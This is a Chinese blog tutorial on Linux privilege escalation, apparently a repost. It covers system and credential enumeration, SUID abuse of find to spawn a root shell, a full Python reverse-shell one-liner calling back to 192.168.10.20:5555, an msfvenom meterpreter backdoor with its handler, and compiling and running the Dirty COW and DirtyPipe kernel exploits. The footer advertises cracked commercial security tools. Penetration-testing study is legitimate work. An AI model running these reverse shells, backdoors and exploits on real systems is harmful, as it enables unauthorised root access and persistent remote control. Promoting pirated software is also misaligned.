Linux权限提升系列:内核、SUID、脏牛等提权(建议收藏)

admin 2023年6月6日09:39:45评论31 views字数 11676阅读38分55秒阅读模式

最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:

给公众号设为星标

加入交流群”棉花糖娱乐圈圈圈“也能第一时间获得推送噢

老群“棉花糖娱乐圈圈“已经被封

由于公众号经常被封,所以搞了个小号以防失联


本篇文章所有内容来自付费圈的师傅
作者:剁椒鱼頭没剁椒
csdn昵称:剁椒鱼头没剁椒

前言

关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。

权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。

同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。

基础信息收集

在进行Linux系统提权之前首先需要先对系统进行信息收集。

内核、操作系统、设备信息等

通过下列命令,可以判断主机在域中的信息、内核信息、系统信息,便于通过这些信息搜索一些用于提权的内核漏洞。

uname -a    ##打印所有可用的系统信息uname -r    ##内核版本uname -n    ##系统主机名。uname -m    ##查看系统内核架构(64位/32位)hostname    ##系统主机名cat /proc/version    ##内核信息cat /etc/*-release   ##分发信息cat /etc/issue       ##分发信息cat /proc/cpuinfo    ##CPU信息cat /etc/lsb-release   ##Debian cat /etc/redhat-release  ##Redhatls /boot | grep vmlinuz-

用户信息

通过查询相关的用户信息也能够在为提权上做出相关的参考。

cat /etc/passwd     ##列出系统上的所有用户cat /var/mail/rootcat /var/spool/mail/rootcat /etc/group      ##列出系统上的所有组grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'      ##列出所有的超级用户账户whoami                 ##查看当前用户w                      ##谁目前已登录,他们正在做什么last                   ##最后登录用户的列表lastlog                ##所有用户上次登录的信息lastlog u %username%  ##有关指定用户上次登录的信息lastlog |grep -v "Never"  ##以前登录用户的完

用户权限信息

whoami            ##当前用户名id                ##当前用户信息cat /etc/sudoers  ##谁被允许以root身份执行sudo -l           ##当前用户可以以root身份执行操作

环境信息

env        ##显示环境变量set        ##现实环境变量echo %PATH ######路径信息history    ####显示当前用户的历史命令记录pwd        ##输出工作目录cat /etc/profile   ##显示默认系统变量cat /etc/shells    ##显示可用的shellrccat /etc/bashrccat ~/.bash_profilecat ~/.bashrccat ~/.bash_logout

进程与服务

ps auxps -ef topcat /etc/servicestop

image-20230330154408523

安装的软件

这里通过使用下列命令,能够知道安装了哪些程序、什么版本、是否在运行等信息。

ls -alh /usr/bin/ls -alh /sbin/ls -alh /var/cache/yum/dpkg -l

image-20230330154604228

服务与插件

服务设置是否配置错误,是否附有(脆弱的)插件。

cat /etc/syslog.confcat /etc/chttp.confcat /etc/lighttpd.confcat /etc/cups/cupsd.confcat /etc/inetd.confcat /etc/apache2/apache2.confcat /etc/my.confcat /etc/httpd/conf/httpd.confcat /opt/lampp/etc/httpd.confls -aRl /etc/ | awk '$1 ~ /^.*r.*/

计划任务

crontab -lls -alh /var/spool/cronls -al /etc/ | grep cronls -al /etc/cron*cat /etc/cron*cat /etc/at.allowcat /etc/at.denycat /etc/cron.allowcat /etc/cron.denycat /etc/crontabcat /etc/anacrontabcat /var/spool/cron/crontabs/root

是否有存放明文密码

grep -i user [filename]grep -i pass [filename]grep -C 5 "password" [filename]find , -name "*.php" -print0 | xargs -0 grep -i -n "var $password"

查看与主机通信信息

lsof -ilsof -i :80grep 80 /etc/servicesnetstat -anptlnetstat -antupnetstat -antpxnetstat -tulpnchkconfig --listchkconfig --list | grep 3:onlastw

日志信息

cat /var/log/boot.logcat /var/log/croncat /var/log/syslogcat /var/log/wtmpcat /var/run/utmpcat /etc/httpd/logs/access_logcat /etc/httpd/logs/access.logcat /etc/httpd/logs/error_logcat /etc/httpd/logs/error.logcat /var/log/apache2/access_logcat /var/log/apache2/access.logcat /var/log/apache2/error_logcat /var/log/apache2/error.logcat /var/log/apache/access_logcat /var/log/apache/access.logcat /var/log/auth.logcat /var/log/chttp.logcat /var/log/cups/error_logcat /var/log/dpkg.logcat /var/log/faillogcat /var/log/httpd/access_logcat /var/log/httpd/access.logcat /var/log/httpd/error_logcat /var/log/httpd/error.logcat /var/log/lastlogcat /var/log/lighttpd/access.logcat /var/log/lighttpd/error.logcat /var/log/lighttpd/lighttpd.access.logcat /var/log/lighttpd/lighttpd.error.logcat /var/log/messagescat /var/log/securecat /var/log/syslogcat /var/log/wtmpcat /var/log/xferlogcat /var/log/yum.logcat /var/run/utmpcat /var/webmin/miniserv.logcat /var/www/logs/access_logcat /var/www/logs/access.logls -alh /var/lib/dhcp3/ls -alh /var/log/postgresql/ls -alh /var/log/proftpd/ls -alh /var/log/samba/
Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

脚本收集

这里使用github上的一些自动化脚本收集。

LinEnum

Linux枚举及权限提升检查工具,该工具除了RCE无法收集,其它的信息都能收集,主要收集:内核、发行版本、系统信息、用户信息、特权访问、环境、作业、任务、服务、web服务的版本、默认/弱口令、搜索等

下载地址:LinEnum[1]

上传脚本

首先将文件上传至/tmp目录下,一般来说在/tmp目录下,一般是可以进行可读写可执行的。

chmod +x LinEnum.sh  ##添加执行权限

image-20230402080511772

执行脚本

这里就可以执行脚本了,返回的信息很多,可以看到SUID提权用到的信息等,以及历史命令,万一找到root曾经输入过的密码呢???

./LinEnum.sh

image-20230402080842427

Linuxprivchecker

这个同样也的对服务器上的信息进行收集,但是不像LinEnum那样有颜色进行表示,看起来不太方便,所以一般来说不太喜欢这个,但是可以对比,看看是否存在遗漏。

这个脚本是使用python进行执行的,通常Linux是会自带python环境的,如果没有就GG,所以为什么说相比LinEnum不好用,就在这里。

下载地址:Linuxprivchecker[2]

执行脚本

这里就不在提上传脚本了,由于是使用python进行执行的,也不需要添加权限,直接进行执行。

python linuxprivchecker.py  ##服务器要存在python环境。

linux-exploit-suggester

这个脚本会输出内核等信息,然后输出可能存在的漏洞,包括exp的下载地址,可以下载对应的exp来测试。有橙色标签的说明更符合目标机情况。

下载脚本:linux-exploit-suggester[3]

执行脚本

chmod +x linux-exploit-suggester.sh  ##添加执行权限./linux-exploit-suggester.sh   ##执行脚本

执行漏洞

在通过脚本的判断后可以通过给予的信息下载exp进行提权,这里需要注意,如果网络环境不好,可能下载exp会出现错误,如果出现这个情况,可以直接百度搜索给予的下载连接去手动下载,将下载完的exp上传上去。

这里可能会遇到下载的c语言环境的脚本,需要c语言进行编译,而服务器上可能很少会安装c语言环境,那么你可以本地进行编译,将编译完的exp再上传上去执行,不过最好找一台同样型号的进行编译,不然会出错,普通用户是没有下载c环境的权限,除非管理员给这个用户添加了权限,但是在实际环境中,多数都是web权限的用户,怎么会有下载权限呢???

c语言环境在下面的脏牛提权中提到了,这里是我后补的,我就不想改了,可以拉到下面看。

下载EXP

可以看到我想说的就是这中情况,要不没有下载功能,要不由于下载的都是国外的服务器,访问容易出现问题,所以就只能手动下载了,至于下载地址,你可以仔细看每一个rce编号下面都有一个连接,那个就是下载连接。

image-20230402084456239

image-20230402084708957

查看EXP

这里先查看一下EXP,在EXP中都会存在编译的命令,可以使用工具打开c环境。

编译EXP

在编译EXP之前需要先将文件上传上去,如果网络好,就不需要上传EXP了,然后进行编译。

gcc 15150.c -o 15150    ##前面15150.c是文件,后面的是自定义的编译后文件名称

image-20230402085301035

执行EXP

我这里换了几个都没有运行成功,总的来说还是需要一个一个测试的,下面的截图就是我换完后的,不过exp那么多总归可能有成功的,只是我测试了几个都没成功吧了。

./15150

image-20230402090410377

linux-exploit-suggester-2

这个和上面的类似,只不过更精简,也更准确一点。

下载地址:linux-exploit-suggester-2[4]

执行脚本

这里下载完后,添加一个执行权限,然后进行执行,看下面的图片就能看出没有解释器,我这里是重装的云服务器系统,上面什么都没有,通过百度搜索,好像安装mysql也是需要这个解释器的,那么应该装数据库的服务器上应该都是有这个解释器的。如果没有可以执行命令"yum -y install perl perl-devel"进行安装。

chmod +x linux-exploit-suggester-2.pl  ##添加执行权限./linux-exploit-suggester-2.pl  ##运行脚本

image-20230402091237438

执行效果

可以看出有很多漏洞,那么同样是根据下面给到的EXP下载连接去下载,然后执行即可,这里就不演示了。

SUID提权

SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。

在 Linux/Unix中,当一个程序运行的时候, 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程中,是root权限。

suid权限仅对二进制程序有效(binary program)(系统中的一些命令),不能用在脚本上(script)。

执行者对于该程序需要具有x的可执行权限;

本权限仅在执行该程序的过程中有效(run-time);

执行者将具有该程序拥有者的权限。

SUID设置

这里举个例子,看一下SUID如何设置。

新建一个1.txt,并且查看现有的权限,然后加上SUID权限,看文件的变化,通过从权限上的变化也能够看出,所有者权限位上出现了S,那么就证明这个文件存在SUID权限,也就是说当普通用户去执行该文件的时候也是以root权限去执行。

image-20230331082536459

查找拥有SUID权限的程序

这里使用下列命令,可以查找到拥有SUID权限的程序,同时也能看到,刚刚我们添加的1.txt也被查找到了。

find / -perm -u=s -type f 2>/dev/null-perm 指定权限-u=s 表示SUID权限-type 指定文件类型f 表示常规文件,而不是目录或特殊文件2 表示该进程的第二个文件描述符,即stderr(标准错误)/dev/null 是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。

各类提权命令

常见具有SUID权限的二进制可执行文件如下:

nmap vim find bash more less nano cp awk

这个可能存在一个疑问就是,为什么刚刚查找到的命令中并没有这些二进制可执行文件,是由于当登录的用户为root权限的时候,就会出现默认的所有命令都是以root权限去执行,但是在实际环境中,由于root权限过大,当管理员想要管理的时候,通常会将一些常见的搜索、文本编辑、下载安装等设置上SUID权限,让在普通用户权限下也能够以root权限去执行。

这里我们添加一下find设置为SUID权限,让普通用户也能够查找文件。

chmod u+s /usr/bin/findll /usr/bin | grep find

image-20230331090409191

下面参考网站,在网站中含有各类提权方式,去产找一个SUID即可看见相关的命令,以及使用方式。

CTFOBins[5]

SUID提权参考[6]

find提权

这里就拿find提权做个案例,其它的命令均可在网站中找到相关的操作命令。

测试环境:centos7.6

这里我并没有搭建web网站,然后上传文件获取webshell去执行,而是直接在靶机中操作,其实操作方式都一样的,不存在其它的操作方式,所以无需在意。

查找SUID权限

这里我切到普通用户,如何进行查找SUID权限,能够看到刚刚添加的find命令是存在SUID权限的,不同的Linux类型有不同的搜索方式,可以一条一条测试。

find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;find / -user root -perm -4000 -print 2>/dev/null

寻找find命令

从刚刚给予的网站中找到find命令,如何点击进去就能够查看相关的操作方式。

image-20230331091452616

尝试提权

这里首先看一下现有获取到的权限是什么,可以看到就是一个普通用户权限。

image-20230331091622085

接下来使用find进行提权,文件名可以随便找一个,由于find是查找,所以后面需要跟着个文件名,执行命令就执行你想要执行的命令即可。

这里我执行命令后就能够看到是以root权限执行。

find 文件名 -exec 执行命令 ;

image-20230331093031220

也可以使用使用网站中给予的命令来提权,如果需要

find . -exec /bin/sh ; -quit

image-20230331104359834

反弹权限

这里可以使nc或者python进行反弹,但是在测试中发现反弹回来还是普通用户权限,在执行一些命令前还是需要使用find,不知道网上其它文章为什么反弹回来的是root权限。

这里我使用python反弹做演示,由于我的centos7环境中并没有nc。

查看是否存在python

使用命令可以查看python的版本,以及确定是否存在python

python

image-20230331102338289

生成python反弹命令

可以用下面的网站一键生成反弹命令

一键生成shell反弹[7]

find 111 -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.20",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' ;

image-20230331103023181

反弹效果

这里也可以通过nc或则python脚本进行反弹,但本质上目的都是获取一个root权限的shell。而且通过nc或者python脚本反弹的shell很可能还是普通用户权限,所以建议直接使用上面那种方法。

nc -lvnp 5555

image-20230331103051814

MSF后门木马反弹

这里我们可以尝试生成一个Linux的后门木马进行反弹,在生成之前需要知道Linux是32位还是64位。

生成后门

我们这里知道操作系统是64位的,所以我们生成一个64位的Linux后门木马。

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.20  LPORT=5555 -f elf > shell.elf

image-20230331122326145

开启监听

这里开启kali上的监听。

use exploit/multi/handler                      ##进入监听set payload linux/x64/meterpreter/reverse_tcp  ##监听payloadset lhost 192.168.10.20                        ##设置监听地址set lport 5555                                 ##设置监听端口run                                                                                         ##执行

image-20230331122905795

上传后门

这里将后门上传到Linux系统中,并且给文件添加一个执行权限,然后再使用find进行执行。

chmod +x shell.elf     ##给后门木马添加权限find 111 -exec ./shell.elf ;  ## 执行后门木马

image-20230331122933587

查看反弹效果

可以看到这里使用木马反弹回来的是root权限,那么我们输入内容就无需使用find进行执行了。

image-20230331123006482

总结

至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。

内核提权之脏牛

内核提权极容易让服务器崩溃,所以在使用中需要注意,比如我使用的是云服务器做下面的案例,由于我的云服务器是2核的,提权速度很慢,同时云服务器的CPU,磁盘等基本上快被拉满了,所以在做这个实验的时候,需要注意!!

同时内核提权和Windows溢出提权是一致的,都是寻找相关的系统漏洞进行执行。

脏牛漏洞介绍

漏洞信息:CVE-2016-5195漏洞

影响范围:Linux 内核2.6.22 – 3.9 (x86/x64)

漏洞EXP:脏牛EXP[8]

脏牛提权操作

我这里是先让服务器反弹一个普通权限回来,然后准备使用MSF去操作的,但是出现的问题就是输入shell后很长时间进不去,可能是由于一个服务器是香港的,一个是华为云,连接上存在一点问题,我这里直接去香港服务器上操作吧。

image-20230401175027911

查看服务器内核版本

首先需要查看以下服务器内核版本,然后去判断使用那种内核进行提权,可以看到我们获取到的是一个2.6的符合脏牛提权。

image-20230401175547385

上传脏牛EXP

我们这里将脏牛EXP下载下来,然后上传至目标靶机上,并对其进行编译。

注意

注意这里在Linux中编译的话必须有C语言环境,我参考了好多文章,没一个文章提到这个环境问题的,我对语言不太懂,但是WEB搭建过程中应该很少会用到C语言,同时很多服务器都是安装的都是精简模式,所以都不会带C语言环境,但是如果确实想提权,可以自己提前先编译好再上传。

下面的图片是已经按照好C语言环境的,如果没有按照只会显示"gcc:"后面就没有了。

whereis gcc  ##查看是否存在C语言环境yum install gcc  ##安装C语言环境,注意在普通用户下不能安装。

image-20230401181545540

编译脏牛EXP

gcc -pthread dirty.c -o dirty -lcrypt ##编译

image-20230401181048795

执行脏牛EXP

这里我们执行脏牛EXP即可,执行完成后就会获取到一个用户名为firefart,密码就是刚刚设置的。

./dirty  123456  ##执行,后面的123456是自定义的密码

image-20230401182705360

登录账户

登录后,查看id,发现为root权限,即为提权成功,注意这里我使用云服务器测试完后,再次连接云服务器的时候,发现root密码被拒绝登录了,也就是root密码错误,但是我使用我设置的密码登录,依旧是错误的,这个需要注意。

image-20230401182810236

内核提权之DirtyPipe

关于DirtyPipe漏洞利用的EXP网上有很多,这里我就举其中一种列子,至于其它的提权方式,可以参看其它的文章,或者直接百度搜这个漏洞编号,就会出现一大堆,利用方式。

DirtyPipe漏洞介绍

漏洞信息:CVE-2022-0847漏洞

影响范围:Linux Kernel版本 >= 5.8

Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102

漏洞EXP:DirtyPipe[9]

DirtyPipe提权操作

内核提权需要谨慎,容易让服务器崩溃或者出现其它问题。

查看服务器内核

这里我使用的是kali服务器,内核版本可能有点高,所以导致不成功,可以去看看其他人的文章。

unam -a ##查看内核版本

image-20230402094926956

添加EXP权限

这里需要提前将EXP上传至服务器中,并且给予执行权。

cd /tmp  ##到tmp目录下,原因就看你之前有没有仔细看文章了chmod +x Dirty-Pipe.sh   ##添加执行权限

image-20230402095130852

执行EXP

这里执行一下EXP,会自动跳转到root权限上,我这里未成功是由于kali的内核版本可能太高了,下面图片就是其它人执行成功的效果。

bash Dirty-Pipe.sh

image-20230402100249337

image-20230402100405495

References

[1] LinEnum: https://github.com/rebootuser/LinEnum
[2] Linuxprivchecker: https://github.com/sleventyeleven/linuxprivchecker
[3] linux-exploit-suggester: https://github.com/The-Z-Labs/linux-exploit-suggester
[4] linux-exploit-suggester-2: https://github.com/jondonas/linux-exploit-suggester-2
[5] CTFOBins: https://gtfobins.github.io/#+suid
[6] SUID提权参考: https://pentestlab.blog/2017/09/25/suid-executables/
[7] 一键生成shell反弹: https://forum.ywhack.com/reverse-shell/
[8] 脏牛EXP: https://github.com/FireFart/dirtycow
[9] DirtyPipe: https://github.com/r1is/CVE-2022-0847

下载地址

需要封面图?

后台回复文章推送日期加”封面“即可获取

(2022年十月五日前的文章没有)

例如今天为:20230406封面




Taps:

如果看到这里的师傅的你偏新人向

那么加入我们,性价比绝对超高

内部有新人所需绝大部分资源

包括很多出名的鹏程万里加密培训课程
(这里不便展示)
常见的安全培训+逆向培训+编程培训课程(绝非免费泛滥货)
内部也能分发授权不用再去花几千块几万块
果师傅已经脱离新手
那么圈子内部的交流氛围也是值得一看的
各个方向的学习资料和教程相信也能吸引你
如果师傅你有兴趣了解
请后台回复知识星球或点击菜单栏“付费圈子”查看更详细的介绍
开圈五个月以来已有近900位师傅选择付费足以说明其价值

目前仅需70RMB一年,满1000人涨到99一年(目前进度830/1000)

往期精彩

棉花糖论坛回归啦!

Nessus20230324插件_20230329规则模板_一键破解编译无需限制cpu啦

漏扫哒哒哒哒!Awvs_windows&liunx破解版v15.5更新啦

警惕闲鱼钓鱼链接!已有师傅损失5k!点进来吃瓜啦

burp_2023.3.1更新专业版中文破解_一键启动

代码审计扫描工具Fortify SCA 22.2.2 全系统破解版

漏扫哒哒哒哒:Invicti-Professional-v23.3_windows破解版

近期在github收藏的项目分享(第三期)

xray1.9.4_windows&linux高级版

CS4.7汉化+修改指纹+加密流量+最新ladon9.2.5教程内附成品

windows10渗透虚拟机更新!帮助渗透新手快速搭建工作环境,工欲善其事,必先利其器。

AppScan_Standard_10.1.0中文永久破解版

免责声明

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。

为避免被恶意使用,本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。

在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。

如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。

本工具来源于网络,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!

在安装并使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月6日09:39:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Linux权限提升系列:内核、SUID、脏牛等提权(建议收藏)https://cn-sec.com/archives/1759124.html

发表评论

匿名网友 填写信息